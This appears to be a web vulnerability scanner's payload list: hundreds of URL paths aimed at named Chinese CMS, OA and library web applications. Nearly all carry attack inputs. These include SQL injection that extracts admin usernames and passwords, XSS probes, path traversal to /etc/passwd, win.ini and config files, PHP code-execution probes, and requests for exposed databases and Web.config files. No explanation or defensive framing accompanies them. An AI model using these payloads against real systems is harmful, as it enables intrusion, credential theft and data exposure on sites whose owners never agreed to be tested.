/NTClassDis.aspx?Index=6&KeyWord=1&ALLNAME=1&SrchTab=4&Index2=0&KeyWord2=just'%7C%7C(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(87)%7C%7CCHR(77)%7C%7CCHR(85)))%20FROM%20DUAL)%7C%7C' /NTHoldingRetr.aspx?BIBNO=1&DISP=Holding&TABNAME=ILASBIBLIOS%20where%201=1%20AND%201883=(SELECT%201%20FROM%20DUAL%20WHERE%202918=2918%20AND%205953=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(99)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(5953=5953)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(112)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL))%20-- /NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C' /NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook /NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT /NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20-- /NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20-- /NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20-- /NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)-- /NewsClass.asp /NewsList.asp /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7 /NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)) /OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers-- /OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers-- /ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20-- /Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20-- /Open/DegreeStudentOpen.aspx?xsfl=aaa%27%20and%20@@version=0%20and%20%271%27=%271 /Open/ExpertInfo.aspx?zjbh=aaaa'%20and%20@@version=0%20and%20'1'='1 /OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1 /OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2 /Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20-- /PersonalAffair/worklog_template_show.aspx?id=(select%20char(69)%2bchar(65)) /Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20-- /Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20-- /Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0-- /ProcManage/WebHouse/HousePic.aspx /Product.asp /ProductBuy.Asp /ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9 /ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin /ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1 /ProjectManage/pm_gatt_inc.aspx?project_id=(select%20char(89)%2bchar(65)) /Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20-- /Public/GetPhoto.aspx?type=10&id=1111'%20and%20@@version=0%20and%20'1'='1 /R9iPortal/cm/cm_info_list.jsp?itype_id=3%20UNION%20ALL%20SELECT%2056,CHAR%28113%29%2bCHAR%28111%29%2bCHAR%28116%29%2bCHAR%2871%29%2bCHAR%2880%29%2bCHAR%2882%29%2bCHAR%2881%29%2bCHAR%2872%29%2bCHAR%28113%29%2bCHAR%28120%29%2bCHAR%28101%29,56,56,56,56,56,56,56,56,56-- /RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20-- /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN /RdrRInforDetail.aspx?page=1&Index=4&KeyWord=a&AcqSys=CN&name=r_infor%20where%201=1%20AND%202046=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(103)%7C%7CCHR(109)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(2046=2046)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(104)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20-- /RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20-- /RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100))) /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16 /Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22 /ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc /RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0-- /RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0-- /SH_Data/SH_DataBase.mdb /SRP2003/UserManage/sysuser/modifypage.asp?id=1 /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20-- /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20-- /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20-- /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20-- /ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20-- /Search.asp /Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257() /SecondPages/infodetail.aspx?InfoId=-9631'%20UNION%20ALL%20SELECT%20NULL,CHAR%28113%29%2bCHAR%28112%29%2bCHAR%28113%29%2bCHAR%28115%29%2bCHAR%2881%29%2bCHAR%2858%29%2bCHAR%28109%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28119%29%2bCHAR%28109%29%2bCHAR%28113%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- /SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20-- /Server/CmxGuide.php?pgid=Guide_List /ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4 /SubCategory.aspx?TagIds=1%20and%20char(106)%3E1 /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 /SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20 /SysAdmin/ /SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20-- /SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1 /SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0-- /SysManage/get_department.aspx?corpID=char(106)%2bchar(106) /SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--' /SysManage/role_setting_new.aspx?id=char(106)%2bchar(106) /SysManage/role_show.aspx?role_id=char(106)%2bchar(106) /SystemAdmin/ /SystemManage/ /SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20-- /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin /Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd /Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini /TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20-- /TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20-- /UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);-- /UserSecurityController.do?method=getPassword&step=2&userName=admin /VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1 /VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85 /ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'-- /ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)-- /WEB-INF/ /WEB-INF/database.properties /WEB-INF/web.xml /WS/WebService.asmx /Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93)))) /WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95)) /WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95)) /Web.config /Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0) /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001 /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98)) /WebService/ /Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1-- /Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20-- /Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL /WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0-- /WorkFlow/wf_get_fields_approve.aspx?template_id=(select%20char(99)%2bchar(87)) /WorkFlow/wf_office_file_history_show.aspx?id=1'%20and%20(select%20char(81)%2bchar(87))%3E0%20-- /WorkFlow/wf_work_form_save.aspx?office_missive_id=(select%20char(99)%2bchar(77)) /WorkFlow/wf_work_print.aspx?idlist=(select%20char(98)%2bchar(67)) /WorkFlow/wf_work_stat_setting.aspx?template_id=(select%20char(99)%2bchar(67)) /WorkPlan/plan_template_preview.aspx?template_id=(select%20char(99)%2bchar(65)) /_database/_database.mdb /_database/e3b3ee1b5da271ai.mdb /_database/qiye_free.asp /_vti_bin/_vti_adm/admin.dll /_vti_bin/_vti_aut/author.dll /_vti_bin/shtml.exe?_vti_rpc /_vti_cnf/ /abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/ /abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/ /abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D /about/?module=../robots.txt&fmodule=7 /aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 /acc/clsf/filters/editProtocolFilter.php?protoNum=xxx%22%20union%20select%20111,'webscan','md5(0x7765627363616e)',3%20from%20USERINFO-- /acc/vpn/download.php?f=../../../../../etc/passwd /account.t?op=showAccountList /adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20 /adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20 /adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3 /admin.asp /admin.aspx /admin.cfg /admin.jsp /admin.php /admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1 /admin.php?c=js&f=index&ext=../config.php /admin.php?mod=db&act=login /admin/ /admin/Admin_Config.asp /admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin /admin/Role/Role_List.aspx /admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1 /admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0-- /admin/admin.asp /admin/admin.aspx /admin/admin.jsp /admin/admin.php /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122 /admin/admin_adminmodifypwd.aspx /admin/admin_audit.php?status=1%27%29;phpinfo%28%29;// /admin/admin_database.aspx /admin/admin_login.asp /admin/admin_login.aspx /admin/admin_login.jsp /admin/admin_login.php /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin /admin/backup.aspx /admin/cs/login.jsp /admin/do/proxy.php?method=get&target=http://class.omeeting.cn:80/push/35004/div_push_0/index.html&method=get&target=../../../../../../../../../../windows/win.ini /admin/editor/db/ewebeditor.mdb /admin/fileopen.asp?filename=../index.asp /admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16 /admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16 /admin/htmledit/db/ewebeditor.mdb /admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00 /admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0) /admin/index.asp /admin/index.jsp /admin/index.php /admin/index.php?_m=../template/css/login.css%00&_a=admin_list /admin/login.asp /admin/login.aspx /admin/login.jsp /admin/login.php /admin/login/login.php /admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1 /admin/login_sys.asp /admin/manage.jsp /admin/manageAPP.php /admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin /admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /admin/picupload.aspx /admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E /admin/sysadmin_view.asp /admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00 /admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23 /admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb /admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0 /admin/xiugai_zw.asp?id=-1%20union%20select%201,chr(106),3,4,5,chr(97)%26chr(58),7,8,9,10,chr(109),12,13%20from%20admin /admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20// /admin_aspcms/_content/_Comments/AspCms_TabAdd.asp /admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp /admin_aspcms/_content/_tag/aspcms_tag.asp /admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122 /admin_aspcms/index.asp /admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a) /admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)# /admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)# /admincp.php?infloat=yes&handlekey=123);alert(/webscan/);// /admini/item/iteminfo.aspx /admini/newstopic/newstopicinfo.aspx /admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20-- /administrator/ /adminpage/ /ajax.aspx?type=GetAreaIDByName&AreaName=1'%20and%20char(106)%3E0-- /ajax.php?act=check_field&field_name=user_name&field_data=webscan%27 /ajax.php?act=verify_ecv&ecvsn=360scan%27 /ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27 /ajax.php?action=dig&module=members+where+1%3d1+and+(select+1+from+(select+count(*)%2cconcat((select+concat(0x3a%2cmd5(1122)%2c0x3a)+from+boka_members+where+uid%3d1)%2cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 /ajax.php?action=letter&letter=a&moduleid=1//***/union//***/select//***/1,2,concat(username,0x7c,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23//***/from//***/destoon_member//***/where//***/groupid=1//***/limit//***/0,1%23 /ajax.php?infloat=yes&handlekey=123);alert(/webscan/);// /ajax.php?mod=check&code=email&email=a%2527%2bor%2b%28role_id%3D2%2band%2bascii%28substring%28%252756789%2527%2bfrom%2b2%29%29%3D54%29%2bor%2b%25272%2527%3D%25271&submit= /ajax/execphpcode.php?DontCheckLogin=1&phpCodeType=0&phpCode=exit(md5(webscan)); /ajax/getemaildata.php?DontCheckLogin=1&filePath=../../../tsvr/turbocrm.ini /ajax/search/AjaxSearch.aspx?PSize=1&Brf=3&Cnt=4&ClmnIn=A&Type=NS&S=1'and%201=2%20union%20select%20top%201%20NULL,NULL,NULL,NULL,chr(97)%2bchr(58)%2bchr(99),NULL,chr(99)%2bchr(58)%2bchr(97)from%20admin%16 /ajax_check.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?user_edit_account=-1%22%20union%20select%20md5%280x045154%29%23 /ajax_check.php/login.php/login.php?ippoolID=-1%22%20UNION%20SELECT%201,2,3,md5(0x045154),5,6%23 /ajax_check.php/login.php/login.php?order_check_account=-1'%20union%20select%201,2,md5(0x045154)%23 /ajax_check.php/login.php/login.php?productID1=-1'%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23 /ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23 /allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /announcement.php?infloat=yes&handlekey=123);alert(/webscan/);// /answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20-- /api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12 /api.php?act=1&appname=../../core/html/pages/about.html%00 /api.php?action=File&ctrl=download&path=api.php /api.php?c=api&f=phpok&id=_sublist¶m[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23¶m[phpok]=1 /api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer /api.php?id=_arclist&c=api&f=phpok¶m[pid]=41¶m[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20 /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..%5C..%5C..%5Cphpsso_server%5Ccaches%5Ccaches_admin%5Ccaches_data%5Capplist&path=admin /api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E// /api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;// /api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20 /api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1 /api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1 /api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1 /api/datacall.php?type=user&by=360webscan&order=/**/&limit=1 